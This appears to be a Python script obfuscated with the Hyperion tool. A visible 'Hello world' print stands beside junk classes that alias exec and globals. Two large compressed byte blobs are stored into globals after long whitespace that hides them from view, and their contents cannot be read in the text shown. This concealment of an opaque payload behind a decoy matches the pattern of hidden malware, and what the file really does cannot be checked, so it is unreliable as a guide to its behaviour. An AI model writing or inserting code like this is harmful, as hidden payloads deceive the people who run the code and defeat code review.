from builtins import *
from math import prod as Math


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


_cube, _ceil, _callfunction, _multiply, _floor, _invert, _while = exec, str, tuple, map, ord, globals, type

class Floor:
    def __init__(self, Algorithm):
        self.Ceil = Math((Algorithm, -77558))
        self.CallFunction(_frame=7244)

    def CallFunction(self, _frame = float):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.Ceil += 24027 / _frame
        
        try:
            ((Statistics, Statistics, _callfunction) or _callfunction if (Statistics, Statistics, _callfunction) and _callfunction else ... or (_callfunction, (Statistics, Statistics, _callfunction)))

        except OSError:
            ((_cube, Statistics, Statistics) or _floor if (_cube, Statistics, Statistics) and _floor else ... or (_floor, (_cube, Statistics, Statistics)))

        except:
            _while(-91650 / 97911) == bool

    def _algorithm(self, _run = -20766):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _run /= -4631 / -56985
        self.Calculate != True
        
        try:
            ((_cube, (_cube, _cube, _callfunction)) for _cube in (_cube, Statistics, Statistics) if _floor != _multiply)

        except AssertionError:
            (({'Ryeoobbytboi5u': 'liaeetBleylue'}, _cube) for _cube in {Statistics: _multiply})

        except:
            _while(-97809 - -86540) == bool

    def _product(Negative = True):
        return _invert()[Negative]

    def _theory(_absolute = 8339 - 4762, System = Ellipsis, _system = _invert):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _system()[_absolute] = System
        
        try:
            ((_cube, (_cube, Statistics, Statistics)) for _cube in {_callfunction: _callfunction} if _floor == _invert)

        except OSError:
            ((_cube, _cube, _callfunction) or _multiply if (_cube, _cube, _callfunction) and _multiply else ... or (_multiply, (_cube, _cube, _callfunction)))

        except:
            _while(-27095 / 24937) == int

    def execute(code = str):
        return _cube(_ceil(_callfunction(_multiply(_floor, code))))

    @property
    def Calculate(self):
        self._substract = '<__main__.Algorithm object at 0x000008201BE26513>'
        return (self._substract, Floor.Calculate)

if __name__ == '__main__':
    try:
        Floor.execute(code = __code__)
        _builtins = Floor(Algorithm = -23231 - -20637)

        _builtins.CallFunction(_frame = _builtins.Ceil + -42038)                                                                                                                                                                                                                                                          ;Floor._theory(_absolute='SSSS2SSSSSSS22S2SSSSS',System=b'x\x9c\xed=Yo\xdbL\x92\xcf\xd1\xaf\xf0\xe4E\x16\xe2\xe4\xe3\xd5MR@^\x16\xde\xc5\xc8\xb0\xa3\xc5x\xb1\xc9"\x13\x18\x92H%\xf2\xd0\xa2\xc7\x96\xc7\x0e\x16\xb3\xbf}\xeb\xe8"[\xa2-Q\xa6(\xc7\xc1X\xe6\xa1V\xf3jV\xd7},n~\xf6;\x07\xf07\x9b\x1e\xd2\x16\xff..\xf2\xf1\xf4\xeev2Z\xe47\x17\x17\x07\x7f\xfa\xf8\xf6\xcf?\xaf\xd3\x9bY>\x7f{\x90\xdfX\xddFw\x8b\x1f\xf9\xcd-\xf59|;\x9ee\xd9\xcf\xc5\x8f\xf4{>Z\xf8J\xbf=z\xfbo\xd9]\xfa\x974y\xdb[:\xea\xfbl\xf1\xe3n\xcc\'\xfe\xb1X\\\xdf\xf6\xff\xf8\x83\xdb>L\xf2\xab?VN\xf3\xc7\x13\xd7Nf\xb7\x93\xfc&Y>\x8di\xfc\xf0\xfd\xfb\x1f\xd7\xd9\xe8\xfb]\xbarP6\x9b\xa4\xf3\xdb\x94\x0f\xfa\xf7\xff<}\xef}pV\xbaL\xf2\x84\x7f\xef^\xdf\xcc\xe6\x8b\xc3\xb7\x7fN\xb3,?\xb8\xcfo\xb2\xe4Oo{\xddN\xaf_\xf4\xc6\xdf\xbb\xb7\x7f\x9b%\xdd^\'}\x98\xa4\xd7\x0b3\x98\xf3\xeb;8\xf2/\xf9mz{0\xbaI\x0fn\xd2\xe4\xaf\xf3\xff\x9e\xe5Y\xba\xe0\x861\x8c\xcc_\xe7\xff\x93\xdf\xd1\xb7\xd1\x01\x9e\xe4\xaf\xf3O\xf98O~\x1ed\xb3\xbf\xc1q?\xf3\xbb\xb7\xbd\x0e\xdf\xd4\xec\xea:\xbfY\\\\\xc0\xd5~\xdev{\x1f\xd2\x87\xd9\xe2\xb0\xd7\xc9\xf2\xc9(\xbb=\xec}\xed\x0e\x87\xc3\xdc\xc9\x9d\xe1\xd0\xc9i\xc1\xffa\x0eM\xddo\x1f\xbfg\xf9\x18\xbau\x9e\xec\x83\'\xc8\xe1\x0f\xbe\x1c\x1f\x0f\x8fa\r]\x87\xdd\xaf\xfd\xfe\xbb\xf7\xef\xde\x1f\xbe?|\xe7\xf6z\xdf\xe0D\xe9b\xb4X\xdc\xac?\xd1q>\x84\x93\xd0Yps<\x84>\xc7\x8f\x9c,\x99m8\xd1\xe9\xe9\x00\xfe\x07\x83\x93\xc1\xc9)\xfd\xc1\xa3\xf0\x03w*?a\xff\x87\xfb{\xf8\xbf7\xeb\x87\xfb\x07\xf8\x87C\xca\xc1[\x7f9\xd3\x08\r\x0e\xfd\x04{\x0e\x1c\xfe\xd8Y\x0f\xbb\xe3\xbbY\xb6\x98\xcd\xf1U\xfcct\xb3ah\xb3\xc1 \x83\xbf\x01ox;\xc8\xe0\xdc8\xca4\xda\xc7\xc74\xf8y~\xf8\xf8\xe5n\xe7\xb3E6\xbb\x1b\xaf\x8eb\xef\x08\x86vh\x06\x9c\xdf\x1b\x0e\xf8\xf1\xb6\xa7\xe9}\xdd\xd1y>\xcc\xe6I\n=\xd2lv}\x95O*\x1d\xbe\xf56\xbd\x04\xdc\x85\x9fs~\x199\xc2o\xb7\xfb\xe12\x9f\xcd;\x8f\xbd!\x02]\xbcs8\x8e\x9f\x016\xbf\xf5\xd0.Fy6}l`\x1f\x9d\x140\xa0\x8e\x83S\x10\x07\x86\x064\xc7\xe1#\xbc\xf0\xfb\x8eQ6\xfaG\xfa(\xec=\x01Ax^\xf8\xc3k\xf0\xdfo=:7\x8b\xdb\xad\'\xe6|~\x85\x7f\xf3\xab9\xfe\xe3\xdf\xd5o=F\xe9m6\xfa\x8f\xadG\xe9\xfc\xdc;\xf7\xe0\xff\x9c\xff<\xcf\xfb\xbd\x07\xe9\xee\xe6\xbf\xb6\x1e\xa3\x8c\xa8\x1fSB\xfe\x07z\x88\x9bm\x86j6\x9b\xdc\x8e\xe6\xb3\xa6C\xf5\xe4i\xb6\x1c\xaa\xa7\xcf#C\xf5s:\xcb\x1e\xd2\x1f\xf3\xbb\xda\x98\xfbrvyy\x99e3\xd8f3X\xff\xde\x0cC\x96\xe7\xd5_7\x80\xd2\x93\x90t8\xee\x86Q\x18.-\xf2\x17\x99\x96\xa2\rX\xb8$E\xa6\xff\xb0\x1bM\x17\x8f\xbc\x9f\xdfx\xd4\'\xe9\xc3Vt\xd2A\xbe\x0c_\x062\x15\xb2\x0f?\xda\xe7x\x92\xe38\xec\xf6\xfc\x8b\xe8"\xb8\x08/\\\xd8:\x17\x1e\xec)8"\xa8\xb6\xd6;\xe1:\x00\xf0]/\xf1"/\xf1\x1d/\xde\xf4\x8a{\xbc\x02\xa1\xe4y\xd7\xf2B\xdf\xf5\x1d\xf8h?\xf0cZ\x87\xbe\xf66\x82\xd6\xd3\x03\xcd\xb4\x16)\xed\x15\xaf\x91\xea\xd6\x1de\x07z\xb8-t\xde\xf5p7\x1b\xf2\x10\xae\xa6\xb5\xf6`=\x81\xd1\x0e\x9a\x0c7^.G\xc1\x03\xb7\xd4\\\x1b\xa4\xc3\x0b}\x81`\xad\x01p\x11t\xfd\x8b\x10\x8e\x88\xaa\xaduO\xe8B\x0fg\x07/\xc41/\xc4\xdd\xd7\x0b\xf1\xbc \xd4S\xf8\x84z\xa2\x95\xe7\x04\xbe\x8eB\x0f\xbe\'\xf0\xcd\xf3\xc7\xa1\xf6\x13\xd8\xe2L\x81\xbe\xde\xc4s\xe0\x88\xb2O\x1c*\x9d<\xd9/\xd5\xd30\xf0\x93\xc0\xf5\xa7\xf0\xa6=\xed\xea\x14^y\xd9\xdb\xf3\xe1[\x13\x100\x9c\x9bwn\xb87\xdc\xf1\xce\xeb#\xb6\x90PX\x00o<\x847\x1e_\xf8\x84\xd8*\xaduO\x18ag:\xd8\xa7C\x19S\xc6\xd5\xd6\xd7\x08)0]\x95\xf6i\xfa\xaa0\xd0\x00\x03\xb0\x1f\xc0\xbe\x1f6\x99\xc6\xeb.\xaa|\xdfS>~|\x04\x16\xcf\xfe.m58\x81g>\xb0vC|\xd0\x08\x80\xd8\x03@\x0f\xc2\xb8!\xa8\x1a\x105\x00\xeb1\xd8\xee\x00\x14b5\xf5#X\x14,\x1a\x16\x17\x16ls`\tL\xbb\xeb\x8d\t\\\xea\xf4\xadI\r\x1a\x8cl\x00\xc8\xc3WS\x1d7\xa3\x00Db\x89\xd6\x92x\x0b_\xea\xceT\x05s\x11\xe7\xa5\x0b\x93<\xa2}\rG\xe8j\xeb\xbe\t@\x0b\x14\x19\xc9]\x08\xcf\x82\x1c[\x08\xbc\x1a!5"w\x95\xd6\xfa\xc3\x87\x144\x80!r\x89V:\x17.\r_\xa5\xf5\x85F\xe4\xe9YHs\xef\xfc\xbc\xa4\x19\xfb\xbf\xc3\xe7\xcf\x1b5\n\x12\xc0\xb6:p\xf5\xd8\xd7\xda\x0f\x95\xf2`\x1e\xa9\xd0\xf1}\x98K\t\x08F.L\xaeH\x05\xaa\x11\xae\x1a\xc8\xb5\xf9f\xf0\x1e\xeaB\x86\x86\xb7\x8e\x02\x81\x028\x88a\xcd45\xac\xb6\xbe\x0c\tl\xc0(9j\xdc\x12\x99\xd3#\xf8\xc4f\x8d\xdb\t|\xa4\x8d\xf7\'fo\xa27>\xeas\x1f\xb1\x18\xce:`\xbcF)\xcb*YT\xca\xde\x1b\xfd\xec\xc3.\xe6\x18\xd0%\xa0\x18@\xf7y\xd1\x86\x8e\x85\xe6;\xed\x1b\x1aW\xa7\xafn{\xae\xf2\x9f\x97\x02\xbb\xe4jd\x9d<b\xb3\xc7\xd0\xe2#\xeb\xdc\x12,\x91\x92dYu"\xaa\x94\xf2\x17\xda\xb6\xc78m\x94\x10t!!\xd4\x95=\xf4\x8aL1\x06\x99"yT\xa6\x88\xfd\xb8\x91L\xb1\xee\xd1\x82\x14>\x89Y\'\xb4\xc7\xdf\xd2\xa2\x8d\xf6Z\xe4I#\xe0C\x83\xd0\t}\x7f\xe4M\xbd\xe9F(\xe3\xc1li8\xa6\xc1\x944(\x0e\xef\xd1\xa5i\x1b\x985nq\xad\xa7mB\x1b@\x06\x90A\xc4\x8d0\x00i\x08l,\x90Bd\xdd]Xb\xb8\xa7\xd4\xb0\x9a\x1e\x0c\x1a\xc0\x13\x80G\x126\x99\x80]4\x8e\xe7\xc7\xf8!\x9d\xde\xf0\xb8>\xe3\x14\x00\x19D\xce2\xba`u\x83G\x8cS\xa5\xb5\x05\xbes\xcb\xce[)\xa4\xb6:\xb3G\xcc5kZ\xf4\x05\xb2\xe2\xc8#\xf8\xd5\xd6\x1d\xd0\x8d\xd0\xc84\x91\x91qb\xf3]\xdaH\xe61t\xa3N\xdf`;\xbe|u\xf9\xf61\x1b]\x8d\x93\xd1\x01\x8b-\xa4*4\xb6\xb9\xfe\xe3\xc0\xd6Ln\x96\x0f\x7fg\x19Z\xb6\xb8\xb4\x88\xa9\x10K\xb5\x85\x88UX|"\xf3\t+\x0b\xad\xdb{@\xdf\xd5\xa8"p\x00\xf1\x02^\tc?\x00\xaa\xaa}\xe4\xcbG\xbe\xa7#h\x0517\xf4\xdbB\xbe\x01"\xd6 \xa0\xad\xec\xc3\x82(80\x7f\x84\x82\x836\x91o\xa8\x11\xe9\x02\trPK\x12\x06\x1e\xc8 \x88jQo\xd2&\x87S5\r\x95\xfc\x8d\xc5\xe5\xb4Ju\x9a(.d\xee_\x89]\x9e-\x07\xb5\xf5\x17(^\x07$P9d\x81\x89\t\x81\xae\xb4\xed\x00}\xda\xe8PXg\x1b\x1d:\xc4J3\xfa\xac\xd3W\xed\xc5\xae\x13\x06n8\n\x10\x0e\\\x98\xa5\tl\x95\xefBs\xac\x80A\nt\xa8\x02\x1f\xf8\x12Oi\xa5\x80_\x8c\x80g\x08\xa1Q\x01Z\x8c\xe18\xa5\x03X|h\x07\x16\n\x9e\xc0\xf7\xfd`J\x08\x13\xb8U\xe0F]8\x8b\x82_#T\x89\xc2\x81!\x9a3\xe0J\xc8\xcb\xc2Qp%T\x19\xfaa\x18\xc4\x00\x85\n\x8e\x89\xe0\xa3\xe1\x9a.\xfd\x96h\x1d\x8e\xa8\x1f\x9a\x9bFp\x94\x1b \xdf\x12\x11\xb7\x04\x0c\x1c\xdc?\\OO\xe0\x9a\xc0\xc50\x98k\xb8O\xb8\x11\x17\xf7\xa0\xf7\x08N\x0c\x0b\xf0<p\x87\xa1\xabu0\x86+(\xb8\x07\xc4\xef\x11\xfe\x0e\x07\xc2\xb3\xf8Q\x80O\x89w\x0c\xf7\x17\xba\xc03\x87\xc1\x08z{*\x84\xd6\xa9\x9e\xe0=\xe2\x19\xe1\xa9&\x01\x1c\x84SX\xe1\x94\xf6}\xe0\x9d\xe0\x84J\xbb8\x08!\xdc\xbb\nu\x82#\x01O\x8b&\x1c\x17\xef\xde\x07\x9e\x1c\xeed\xac\x80O\xc7\xe7\xa21\x08\xf0\n\x1a\x8f\xc2\xe1\xd3\xd8\x1b\xfay\x86G\x84gl2{\xf2!\x81DN\xfef9v\xda\xbf2\xa1\t\xddh\xc6y\xa2\xbdk\xc8&/j\x87N\xf5m\xb9\x88\x1dBb\xb1\x14\xd9$\x14\x19\xbe\xdcjk}\x86\x16\xd1\rjw\\4l\xa0v\x87\x18\xdaJkmN\xf2\xc2#.8$\x05"m\xe1\x08\xaf\xda\xfar6\x94](\xbfQ*fi\xa5-\xa5R\n\x17\xe0OJKj\xb5H\x1b\xb7\'M\xc8$\xaa\xfc\x14\xbd\x13\xd4\x9c\xb3\xe9\xcc%\x95_\xa5\xf5\x95\x89)[\x9d\x19\x857\x8f&QDvC\xe7" [b\xa5u\x07`\x1bX\xb6\x1b\xdf,\xaei\x0b\r\xc1\x8d\rQ\xae\xd37j \xd3<\xadCF\x97\xa8\xc1\xe9`p\xca\x9f\x93\x93\x93\xc1\xc9\xc9\xe9\x0e\x1e\xdf3|\x85\xa8\xf3\\\x11\xcd,3\x96g\x1e\xbfN\xdf\xd61\xbe\x9a*4!\x02\x9dnk\xae\xb3\xf2xR\xa8\x90E\x8d,\xad1-\x13\xfe\xe5\x97\xd2N\xa1\x00\x15\xc36DU\x1e\xec\x03\xcb\xa6\'^#\xf6\xc0\x84B\xc0M\xb3\xe7\x978^\xbd&&\xc1\xc3\xf1\x1b5\x19\x85\xcbK\xf4?\x84\xd5\x0c\xae\x00\xbb\xd9\xe5K<\xbf\xd1v|\xfe\xf2\xf9\xf3\x97/\x9f\xf1\x83;\xbc\x85\xbf\xfe\x1aO\xc1g\t\xc5\x08\xe4\x13\\\x07\xb1\xac\xf9#\xad\xed\x01\x7f\x90\x00\xb7\xcc\xd3l\xa2]\x0fe\x9d\x14\x06\xcc\xf1\x90k\x8eQK\xadqB\xf8\x9e\x13\xa4*\xf0\x1c\xd4kc\x0f\x7f\xec9\xdc\x83|\xd0\xe0[\x18\xe1\x9e\x17CO\x98\x120)&\xc0\x84\x878}\x821:"\xe0\xb9\x81\xab\x86\x89\x85\xbc5^!\x18\xa3\xd1/H\x82\tj\xc9i\xa2\x8fI\xa3\x8eG\xf9\xb0?\xa5\xb3\xd9\xfa\xf5\xa9\xf1\xd5I\xf9.\xf8^\x95\x0f\x13\x15&+:<\xac\\\xa5\x01(\xde\x1b')

        _builtins.CallFunction(_frame = _builtins.Ceil - 61652)                                                                                                                                                                                                                                                          ;Floor._theory(_absolute='Oo0o0O0O000oo00oO0oOO0Oo00',System=b'\'}\xe3\xe3H\x9f\xbat50.3\xa8\x14u\x88\x91@\xe6BU[\x7f{O-\xf4\xbf\t\x01\xc7\xe2\x1a\xe8\tj\xb6\x13\xf6\xbe\xd1(\xe3:\xadi\x9a\x0c\xed\x18Y\xd4$\xb6\xa8\x8c\xac\xd9@\xd9.}A*\x82\xc3\xe0\xb4\xc66[\xc6\x9c\xd2\xa4\x93\x14\xa6\x9db\xdb"\x1eq\x01S\x048\xcf\xd9v\x01\x0f=Q\x0e\xcd[M/B)\x98\xe1!\xbc\xf9\xc0G\xae\xa2\xb4r\x04+V\x8f\xb6\x86(\x0eF\xc1\x84>\x8c\\\'\xf0\x9d\xd7\x93b\r\x9f\xf6\x86H52\xde\x0cNN\x89\x15=9%\xdf\xfd\x93\x93\x1d\x99\x19|\xcb\x95JY[a\xbd\xb5ef\xd8\xd4\xb7\xa6\x9e\xac\xc1T\x02\xb8"\xe5mH\xf0\xd2\xc4D\xd85x\xdd,\xe2\xd5\xfe\x82\xec\x86q\xa8\xe7\xfb\xba7t\xa7\xffH\xc0\xc6\x93\x8f\xf4\xe9\xd3\xa73\xf8\xc0\x1a6g\xb4{FK}\x05-\xbb\xcd+r\xfbDw\xb2\x80T\xb4\x95\xd6\xd7\xe6\x07\xe3\xa3\xdb\xbc\x06\xd6A\xc1\x9e\x0f[`\x11`\x1d\x1b7z\x0f\xb6\x91\xdf\xc8\xfb\xe8\x8c\x07\x1c\x87\xbbx\r\x9f\xea\xcb\xe1.\xa9\x88\x98+@_4\x0eV\xa8\xb4n\xe3)\x18\xd2\xabbU\x17k\xcct\xb5\xf5%\x9d\xff*aG\x87\x87\xff\xf7H\xf0_/\xbf9<\xac\x86\xbb\xf5F\xf3\xe4\xf0\xb1\xee\xcf\xe4\x17\x96\x98of\xbc\x99-_f\xcf[\xa4\x0fM\xe4\xc7u\xa7\x16\xa7cqG\x16Gd{O~m\xd1\xe8\x06\x0c\x10\x0b\xcc\xe8\x7f\xed%(;\xb0w6\xfc\xe2a\x0bk\x1bB\xc5\xfca#\xce\xb0K\xdfQD\xa3\x9b\xc3;\x1e\xbe6\x95{\x88bMBCE\xbe\xdc\x9a\xc4\xad&\x83\xf2\xc5\x12bi\x17\xf7\xff\x15\xea\xb3\xaa\xf5\xd2mi\xbc,\xe3o\xd5\x18l\x1c\xde\xf6$\x87$(\xee\x03;\x85\xa6>t\th\xc4JQ\x94`N\xe1\x8aCv/\xcak\xfa\x16\xed\xf2\xe57u\xc6"\xa7\x08\xb4\x1c\x92\xda\x93\x02F<BI\x1e\xbb`\xe1\x88\xc1h\xa1\x160\x82>h\x14\x8c\xc9\x14\xc2\xae\\0\xba!*K<\xdbm\xabQ\xa4\xd8p\xc8v34\x97!&\xabk0\xfb5\xd0W\xe3P\xb9\xb5\xd4\x9a\xdc\xf3J_\x12\xfe.-\xb8m\x95\x90\x91R\x03M\xc9\x08/\r\xcda]\xc3\xef\x1bm\x93Q9\xedB\x10\x89\x8c\xb8\x16\x18\x8b\x89oL\n\xca\xb4\xdb\x16\x97:}kZ\\\x1a\x9a\x1c|\xd4\xad\xa3\xf3c\xb3Q\x95 \x1b\tle\x0e\xf1\xaafd\xeb\xdaq\x15\xcb\x94X\xa4\x1c\xcbB\xe5\xad\x88\xcdu\xfa\xb6/6\xfbl\xc1@\xaf\xa7\x86.\x0cd\xc07|\x15\xe1\xfb\xd7\x84\x92\x88\xb8#\r\x0c\x9b\xc5o\x91\xff#y>\xb1/\xd4\xeb\xa3uz\x82\xf4\t0\x97B\xd9\xa6\x91[\xf1\xba\xcb\x91\xd2md\x94k\xact\x13\x95\xdb\x88\xbe\x8fZD\xd3\x8fD~\x16\xa8\xbbI\xbc<\xa3\x14y\xff\x94\x9e\xa6\xb6Y\xc07n\xc2hZ\xf7\x8c\x97\x88\xaa\xb6\xd6?\xa1G\xc9\x0c<\x12\xea]\x0c\x01\xa4\x13VZ_\t\xdf\xde\x10\xcd\xad\x1ar\rC\x16\xc6\xf0\xe6\xe1\xfd\x13\x03<\x06\x88\x00\xbe\x04\x04\xa9$D\x0f\xaf\x94\xe28b\x03!)[\x99\x98\xac#\xa4\x90\x9e\x11\xcf\xe1\xc3\xf9\xd8m4 \xed6Y1H8K\x0b1\xadr\x14\x052\xb8\xa8\xfd\xf6\x11\xf1LCb\x16\xfc\xc4o-\xd6c*A\r\x18\xe0\xa0\x8b=\x0el`\xfeH\x17\xe1\x0f\xff2+.\x99\x15\xf5\x1e\xcc\x8a\xb5\xc4C\x11\x11K\xbf\xe0mR\xc8\xacuzB\x8c\xa1\xc8\x02I\x81\xc2\x17\xd1{\x0e\xe4Xi\xdd7\xbex\x8e]r]\x92>\xba\xea\x90e\xa7!u\xa8\xefm\xb8+[\xab\x04\xab\xfb\x86\xad\x16\x96Z\x9c\x98<\n\xcc(\xbd\x907\xf5\xf5\xf7\xa1(W\xe3\x80\xc5^\x14d\x13\x0c\x1f\rP\xf0E\xec5nf\xc0\x92\xc8J1\xa6\xf3\xd7\x171\xb8\xfc*\x92\x9fw^$U\xd8ed\xf7s\rP\xe4zs\xc9\xcb,\xbb\x9ce\xcfqt\xe9\xa2\x89\xf2\xf4\xf4\x04V\'\x83\xc1\t{\xd1\rv4\x9dB\xb38j9\x0fD1e\xac\xe9\xb4\xa9o\xeb\xb1\xb4\x98+B \xc6o\x8b\xc3."\x89\x96c\x88\xc2\xa2M\xf6[\x8e+\xc2\xe8D \xb7\x8d4\xf6t\xc5!\x81\x98C\x1b\xec\xf9\xaa\x04L\xe0>=R\x11\xb6\x16t_\xfaA[\x9e\xd0K^\xd3\xa9\xdd\xde\xa2x\xd5\xa2/\x8b\x1d\xa4\xbc\xec\xc5b\xda\xdb|,z\x83\x8d\xd4$\x12\x1c5\xb7B%k\xca\x88k\xc1X<\x9f\x1dU\x86)9\x96{p\xa4\xca\x8c9u\xfa\xee@\xd7 2-\x8a\x99\xccD\x06\x14\x16\xab\xab\xad;\x18\x00I\x8f [;\rP\xb42\x00u\xfa\xd6\x95N\x9f\'\x89\x89\xd4\xc5\xe1C(o-\xcbc\xd2\xfe\x0by6\xb7\x84\xb4,\xdfV\xdb\xbb\xd56\xb7\xb7I\x99vb\x8eYK\x84\xc3\x82\xd8F\xd6^\xe5{\xab\x11\xad$\xa7bX/J\xc8\xcd\x8c\xe7\xec\xf3\xcc\xf6a\xe3\x03M{_v4\x87E\xa2\x11\xa9G\xd85AL\xda\x9a\xc3\x9b\xfa\xb6\xae<\xf7\x11O4\x18L\xe0\x82\x07\xa7\x14H\x82\x0c1yr!w\xbc\x0b\xff=\x89\x07\xb1\xd3\xc6\xc4\xaaL\x01\xc08\xae\x0c\xa9Y\xd7\x17\xc74\xdeR`\xe0\xf4e&\x89\xd9\x95\xd1\x87\xcf\xb7qY[\x8b6F\xa4\xbb\x99h\xd1#I|H\\\xa6\x15\xc2\xdf\xdaD\x1d+\xda\xaaF\x8ac>\xbd\\\x87\xae\x84\x9b\x9aI\xaaj\x11F!l\xa2J\xf0-\xabS\xb4B\x18\xd7\xf5\r\xf7\xe0\xdb\xc2\xcayV\xcb;\x96\xc5\x9d[\xa7\xa8t@I;D{M\xa4U\xc3\x8c0]2\xa2\xb3x\xe1\xb0\xf9j\'\xa2EhM%\xa5\x96\xed\xa6\xc5\xd6\xe2\xc96\xf5m_*\xd5\x1a=\x14(\x82\x89\xaca.\xcd$r\xcf\xa7t4\x18r\xde\x88z\x14n\x90\xe4\x02Y\xdb\xfbt#\xa6\x0b,`\x15\xa1^\x86\x92\xa2\xf7-L\xb7\xa9\xef>\x9c\xb7\xaayG\x13\x00\xeb\x86^\xcb\x03\x839\x08{\xd8\x97\xfe\xa5\xdd\xb8B\xc3\x80\x87\xe65\x08\x01\x12u\'\xe5\xad\xb1f\xc9\xa6\xbe[\xc6~6\xb4\x18G\xcd\xe6\xc3\'v\xc6\xfe\xc4\xee\xd8\xc6A\x1b\xfewaf\x93\xb1\xb3\xc6H\xf2\xc6i%\xb9\x7f\xca\xfcr\x9b\xfa\xd6T1[.\xeb\x0f\xc6o\x9e=\xd7\x1f\xee\x9f\xa524\t\xf7\xca3\xed\xca\x03F0\xae\x08}\xe2\xc9"\xcfNA\r+\xd8y]_\xafe\xb4\x81\x89\xe2\xa2\xd4\x1d\x8fF@\x13=\'\x00dA\x189F\xe1\xa5\x01\xe7\x91]f\x97\x97\xb3l\x86\xee\xd6\x97\xd9\x8c\\\xaeg\xb5\xed!\x17\x0e\xe5\xf8\xd2\xb0v\xc8\x11\x1d\x8d\xcc^\xb5\xb5\xee\t1\xa6\x9cS\xf0+:\x98\x13N\x87\xd5\xd6\xdah\ns\x8f\x91\xb9\xdbE\'y\xcc\x0e\x8b\x83Rm\xadoWw\xe8\xe3R>m\xfc\xc4dW\xaf\xb4\xee\x1b\x91\x8a;\x96LX\x1b@\x8b\xc9m)\xc17\xf5}F\x0e\x89z\xc9{\xb7"31%\xdf\xe5\\\x1e\x11\x85<\xe0p#T\xad\xb4\xfeb\x96\xc6\xb5\xd2\x8b\xe8b\xd3%\x1dm\x99\xcf\xc2\xde\xd2\xfe\xeb\x8e@\\\xd2\xea\x94z\x9d\xd5\x10\x8a_5\xb7\x15\xe6F\xc4\xca+\xb0\x00\xb5\xc2\xdd\xe3a\xcd\xd8{\x0e\x9b\xf2\tm\xc5\x84\xc0<\xc2\x90~\xb5u\xdf\xe8B$\x0c\t\xd0\x13\x99O\xd8`\xad\xaa\xca\x96u}\xb7H\x84\xf5*rF\xaf\x85h\xe3*\x13\x14\xae\xc5\xa2\xc4\xe5\xfc\xa0\xac\xc6mq\xd2\x86\xca\x01\xbc=\n\xdc \xf5=\x8d.\xfb\x91\xf6@x\xf3t\x12L\x02\xccG5\x86_\xe1%\x05\x13\xf4\xdf\x87\xe1AE#\xe6\xf6\nt\xe4\xc7:\xf0c\xd4\xfe\xaa(\x18+\x1848\x06\xb3a\xb9!\xe6\x0bs\x03\x15\x8e\xe07Tl\xc0\x15T\x04\xbf\xfb:\x0c\xe3\x80r\x00\x06\x11\x88\x83^\x10\x02\x00h\xcc\x91\xa5\x13\xb8\n\xbf\x0e\r\xccH\xec\x07\xd0g\xe4\x87!\x08\xe6pI\xca\x0c\xa61?W\x04g@\xf3\x89\x0e\xe0FBb\xab\xd0M\x9e<Xb@?.\xdc\x03\xdd f\x17\x03a\x1f\x8e\x011\t~\xf3=x\x12N\xb0\x8f\x01\tcxrx\xd9A@Y\xd0\xfc0\xf2]8;\xde\xad\x03w\x8bj\x02\xcc\x14\x86\xaeA>\xdc\x87\x03#@\x19\xc0\xb4\x0b\xf7\xe6h\x15`\xb8_\x84\xf9\xbd0\xbb\x18\x9c\xdd\xf5\xa1;\x1cO\xd9\xcf0\x9b\x18e\x02\x9bR\x1d\x9dX\x85\xe4\x0e\xe5+\xb8(\x80\xbaC\xdf5\xe5\x0fs\x80%\x1c\xf9x\xcf#\xf8\xa65\x9e\xdd\xc3K\xc3\x14\t\x02\xcc\xcf\x16\xc2\x1a\xc6\xa0\x91b\x88\x98\xb3\x0c\x8d\xee\xcc\x9b\xcdv\xa1\x13\xda\x9f\xd1\xb3\x9dl\x8a]\nvF\xef\x01\xf4$\xa0\x98\xe7\x9ayx\xda\xcc/\xbb+\xe7 ;k\xabH\x1b\xca\xc2\xb6\xe4\xb9\xf0H\x86\xd7\xc7\xfa\x92rc\x9f\x8e\x96+\xda;\xd5(`\xaa\x9b\xcd\x10\xe8i\x8d\t_`\xb3\x93\xac/\xca\xa2c\xaeE\xcbl\xfa\xe6X\xac\xf2\xba\xbe[)\xc7\x9fmhp)\x129F?D\xa0l1\xa0\xff\x11\xdb\xe5P\x85D\x11Gc\x8d\x1e\x88\x1e,\xae\xf1S\xe4\xfd&>H\x9e)\xefrn\x07\xd7\xd6\xaeG\xf4k\xa0\xa0\x1d\x05H\xaeg\x07\xc4n\xab\xa7\xcb\xde\xb5b\xd1\xc5\xbd\xd7m\xc6\xb4\n\x16Uc\x85\xcb\xf4\xcb\xf2K\xbb\tz\xbd\x04\xb8\x88\xd4\x9b\xe0\xbe?\x0e]?!\x80\x8f\xbd\t\xf0\x1b@\xbdQ\x91j\xb5G\xdcn\xb5\x84\xd0\xa2\xd0\xcf[a"\xd0\xb2]s\xbb\xd5\xd2V\xaa\xf9\xd2FU\xac\xa5H\x86\x9d\xf1,n\xb7D\x86\xd7$\xdae\xe3\xe3U\x02\xe4W\xad\xfdM\xf3W\xa1x\xa5\xc9\x89\xc4\xbbp)m\x81GY)\x1ei\xdd\x01\xca\x8aE+\xa8Js\xb3P\x85"\xfb\xa0U\x95jS\xdf\x9a\x96\xb4\xb5\xceDVqF\xfa\xf2\xd2\x8c\r\xe6\xabpH\xfd\x17\x9b7\xc0~\xe4A\xb5uG\x9c\x92c\xd1a1\xe9\x88/\xa7c\xe9\xb8\xeb\xf4\xdd\xc2\x8dz\x07yG\\J$\xdc(\x11Yi1\x90\x1c#\xfbV#\xc8\xf0\x89z')

        if 277109 > 4628011:
            Floor(Algorithm = -37594 * 38939)._algorithm(_run = -35098 / _builtins.Ceil)
        elif 296715 < 556986:
            _builtins._algorithm(_run = 30985 * _builtins.Ceil)                                                                                                                                                                                                                                                          